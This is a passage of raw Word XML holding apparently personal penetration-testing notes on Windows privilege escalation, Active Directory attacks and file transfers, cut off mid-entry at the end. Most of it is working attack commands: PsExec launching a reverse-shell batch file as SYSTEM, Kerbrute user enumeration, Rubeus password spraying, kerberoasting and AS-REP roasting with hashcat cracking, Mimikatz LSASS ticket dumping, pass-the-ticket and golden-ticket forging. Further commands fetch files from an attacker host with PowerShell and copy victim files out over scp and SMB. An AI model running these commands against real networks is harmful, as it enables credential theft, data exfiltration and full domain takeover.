      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –full smbserver.py). Then run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B378C">
        <w:t>winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008B378C">
        <w:t xml:space="preserve"> on 127.0.0.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7A3CF8" w14:textId="7DBBFE46" w:rsidR="00900340" w:rsidRPr="008B378C" w:rsidRDefault="008B378C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B378C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Extras</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4645DE" w14:textId="5E4241C0" w:rsidR="008B378C" w:rsidRDefault="008B378C" w:rsidP="008B378C">
      <w:r>
        <w:t>To go from local admin to SYSTEM, use PsEXEC.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F31DA8" w14:textId="77777777" w:rsidR="008B378C" w:rsidRDefault="008B378C" w:rsidP="008B378C">
      <w:r>
        <w:tab/>
        <w:t>.\PsExec.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -s “c:\temp\rev.bat”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8AF251" w14:textId="3E1EABAD" w:rsidR="008B378C" w:rsidRDefault="001B5C90">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> also does this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173B2DB1" w14:textId="7080EB4C" w:rsidR="008B378C" w:rsidRDefault="008B378C">
      <w:r>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> doesn’t turn up anything, try other scripts such as powerup and browse the directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6C817A" w14:textId="77777777" w:rsidR="008B378C" w:rsidRDefault="008B378C"/>
    <w:p w14:paraId="165AD8C0" w14:textId="6C716B29" w:rsidR="00EB1FA8" w:rsidRPr="00063C99" w:rsidRDefault="00986D8F" w:rsidP="00063C99">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ACTIVE DIRECTORY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44468B30" w14:textId="5628EDB1" w:rsidR="00EB1FA8" w:rsidRDefault="00063C99">
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00EB1FA8">
        <w:t xml:space="preserve">First add entry to /etc/hosts: IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EB1FA8">
        <w:t>CONTROLLER.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77F04260" w14:textId="6F00AF9D" w:rsidR="00EB1FA8" w:rsidRDefault="00EB1FA8">
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kerbrute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to enumerate users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085E1958" w14:textId="2D9E6B76" w:rsidR="00EB1FA8" w:rsidRDefault="00EB1FA8">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kerbrute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userenum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –dc </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CONTROLLER.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -d </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CONTROLLER.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Userlist.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586369FE" w14:textId="045C3EA0" w:rsidR="00EB1FA8" w:rsidRDefault="00EB1FA8">
      <w:r>
        <w:t>Use Rubeus</w:t>
      </w:r>
      <w:r w:rsidR="004A183D">
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004A183D">
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004A183D">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to harvest tickets (for passing the ticket attacks) and spray passwords:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F0FD40" w14:textId="6F889194" w:rsidR="00EB1FA8" w:rsidRDefault="00EB1FA8">
      <w:r>
        <w:tab/>
        <w:t>Rubeus.exe harvest /interval:30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4900368A" w14:textId="608BD138" w:rsidR="00EB1FA8" w:rsidRDefault="00EB1FA8">
      <w:r>
        <w:tab/>
        <w:t>Rubeus.exe brute /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>password:Password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>noticket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6EE637B1" w14:textId="6800D73D" w:rsidR="00EB1FA8" w:rsidRDefault="00EB1FA8">
      <w:r>
        <w:t>Use Rubeus</w:t>
      </w:r>
      <w:r w:rsidR="004A183D">
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004A183D">
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004A183D">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kerberoasting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, so it will dump the Kerberos hash of any vulnerable users, which can then be cracked offline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E45BD7" w14:textId="5449BA4A" w:rsidR="00EB1FA8" w:rsidRDefault="00EB1FA8">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Rubeus.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kerberoast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B7C78E8" w14:textId="1FEE6191" w:rsidR="00EB1FA8" w:rsidRDefault="00EB1FA8">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -m 13100 -a 0 hash.txt Passlist.txt</w:t>
      </w:r>
      <w:r w:rsidR="00E20049">
        <w:t xml:space="preserve"> --force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBB9708" w14:textId="4A9C65E2" w:rsidR="00EB1FA8" w:rsidRDefault="002204C0">
      <w:r>
        <w:t>Also use Rubeus</w:t>
      </w:r>
      <w:r w:rsidR="004A183D">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004A183D">
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004A183D">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to dump the AS-REP hashes of vulnerable users and crack them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CBB2A8" w14:textId="5E9998D8" w:rsidR="002204C0" w:rsidRDefault="002204C0">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Rubeus.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>asreproast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45898117" w14:textId="09921EC6" w:rsidR="002204C0" w:rsidRDefault="002204C0">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -m 18200 hash.txt Passlist.txt</w:t>
      </w:r>
      <w:r w:rsidR="00E20049">
        <w:t xml:space="preserve"> --force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D22137" w14:textId="187E77D4" w:rsidR="002204C0" w:rsidRDefault="002204C0">
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to dump tickets from the LSASS memory and then pass the tickets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C7CDCB" w14:textId="45319AAF" w:rsidR="002204C0" w:rsidRDefault="002204C0">
      <w:r>
        <w:tab/>
        <w:t>Run command prompt as admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0803B1" w14:textId="0014CC8D" w:rsidR="002204C0" w:rsidRDefault="002204C0">
      <w:r>
        <w:tab/>
        <w:t>Mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F7DC3E" w14:textId="72E119D7" w:rsidR="002204C0" w:rsidRDefault="002204C0">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Privilege::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A93615" w14:textId="6C269A1D" w:rsidR="002204C0" w:rsidRDefault="002204C0">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Sekurlsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>tickets /export</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF3322A" w14:textId="6CC3C0F1" w:rsidR="002204C0" w:rsidRDefault="002204C0">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Kerberos::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ptt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &lt;ticket&gt;</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">(look for admin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCDC10F" w14:textId="537A1AE3" w:rsidR="002204C0" w:rsidRDefault="002204C0">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006D0807">
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="684E1FA8" w14:textId="0A1DC2A5" w:rsidR="006D0807" w:rsidRDefault="001652D4">
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimkatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for golden/silver ticket</w:t>
      </w:r>
      <w:r w:rsidR="003105D3">
        <w:t xml:space="preserve"> attacks. First dump the hash, then create the ticket and use it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C0FAAD" w14:textId="3CF7386F" w:rsidR="003105D3" w:rsidRDefault="003105D3">
      <w:r>
        <w:tab/>
        <w:t>Mimkatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733CDAC1" w14:textId="2F1C87C1" w:rsidR="003105D3" w:rsidRDefault="003105D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Privilege::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7490BF57" w14:textId="3A993C4C" w:rsidR="003105D3" w:rsidRDefault="003105D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Lsadump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>lsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /inject /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name:krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BC69A5" w14:textId="0F31FE1B" w:rsidR="003105D3" w:rsidRDefault="003105D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Kerberos::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>golden /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>user:Administrator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domain:controller.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: /id:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEDFB9F" w14:textId="6CFD7D3E" w:rsidR="003105D3" w:rsidRDefault="003105D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Misc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18866DD1" w14:textId="77777777" w:rsidR="00EB1FA8" w:rsidRPr="001228FB" w:rsidRDefault="00EB1FA8"/>
    <w:p w14:paraId="62114FDE" w14:textId="08157CE8" w:rsidR="00F722E4" w:rsidRPr="00915E3B" w:rsidRDefault="00F722E4" w:rsidP="00915E3B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>MISCELLANEOUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3C9904" w14:textId="7590B1B2" w:rsidR="00F722E4" w:rsidRPr="002E7A38" w:rsidRDefault="00F722E4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E7A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>File transfers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4420BA57" w14:textId="5BCD8DAF" w:rsidR="00F722E4" w:rsidRDefault="005C646D">
      <w:r>
        <w:t>Start</w:t>
      </w:r>
      <w:r w:rsidR="00F722E4">
        <w:t xml:space="preserve"> a python server in the relevant directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437A866E" w14:textId="03788C33" w:rsidR="00F722E4" w:rsidRDefault="00F722E4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00063C99">
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ython -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SimpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F04FB1" w14:textId="47D55AD5" w:rsidR="00F722E4" w:rsidRDefault="005C646D">
      <w:r>
        <w:t>On Linux, u</w:t>
      </w:r>
      <w:r w:rsidR="00F722E4">
        <w:t xml:space="preserve">se </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F722E4">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F722E4">
        <w:t xml:space="preserve"> to access the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401EB139" w14:textId="7AB9061A" w:rsidR="005C646D" w:rsidRDefault="005C646D">
      <w:r>
        <w:t>On windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272C0F3B" w14:textId="023129D5" w:rsidR="005C646D" w:rsidRPr="005C646D" w:rsidRDefault="005C646D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C646D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C646D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c (New-Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C646D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Net.WebClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C646D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C646D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>DownloadFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C646D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>('http://</w:t>
      </w:r>
      <w:r w:rsidRPr="005C646D">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>ip-addr</w:t>
      </w:r>
      <w:r w:rsidRPr="005C646D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C646D">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r w:rsidRPr="005C646D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="005C646D">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidRPr="005C646D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>', '</w:t>
      </w:r>
      <w:r w:rsidRPr="005C646D">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>output-file</w:t>
      </w:r>
      <w:r w:rsidR="008617E5">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>-full-path</w:t>
      </w:r>
      <w:r w:rsidRPr="005C646D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4B7D1A" w14:textId="1D2DD4B3" w:rsidR="0095586B" w:rsidRDefault="0095586B">
      <w:r>
        <w:t>or SMB below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAF91EE" w14:textId="57D1F908" w:rsidR="00A57D8C" w:rsidRDefault="005C646D">
      <w:r>
        <w:t>From victim to me (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0095586B">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0095586B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00A57D8C">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AA765F" w14:textId="2E10AB34" w:rsidR="00A57D8C" w:rsidRDefault="00A57D8C" w:rsidP="005C646D">
      <w:pPr>
        <w:ind w:firstLine="720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proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ssh.socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005C646D">
        <w:t xml:space="preserve">       (on me)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08054D77" w14:textId="55BDB0B3" w:rsidR="00A57D8C" w:rsidRDefault="00A57D8C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> filename </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kali@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>IP:destinationpath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005C646D">
        <w:t xml:space="preserve">     (on victim)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04440906" w14:textId="235DC3C8" w:rsidR="00A57D8C" w:rsidRDefault="00A57D8C" w:rsidP="005C646D">
      <w:pPr>
        <w:ind w:firstLine="720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stop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ssh.socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005C646D">
        <w:t xml:space="preserve">     (on me)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2C9D48" w14:textId="739EDF75" w:rsidR="0095586B" w:rsidRDefault="0095586B" w:rsidP="0095586B">
      <w:r>
        <w:t xml:space="preserve">From victim to me (windows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EF72D5" w14:textId="29FC2545" w:rsidR="0095586B" w:rsidRDefault="0095586B" w:rsidP="0095586B">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0014075C" w:rsidRPr="0014075C">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0014075C" w:rsidRPr="0014075C">
        <w:t xml:space="preserve"> python3 /usr/share/doc/python3-impacket/examples/smbserver.py </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0014075C" w:rsidRPr="0014075C">
        <w:t>kali .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">      (on me)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFD8E25" w14:textId="25415FF1" w:rsidR="0095586B" w:rsidRDefault="0095586B" w:rsidP="0095586B">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Copy </w:t>
      </w:r>
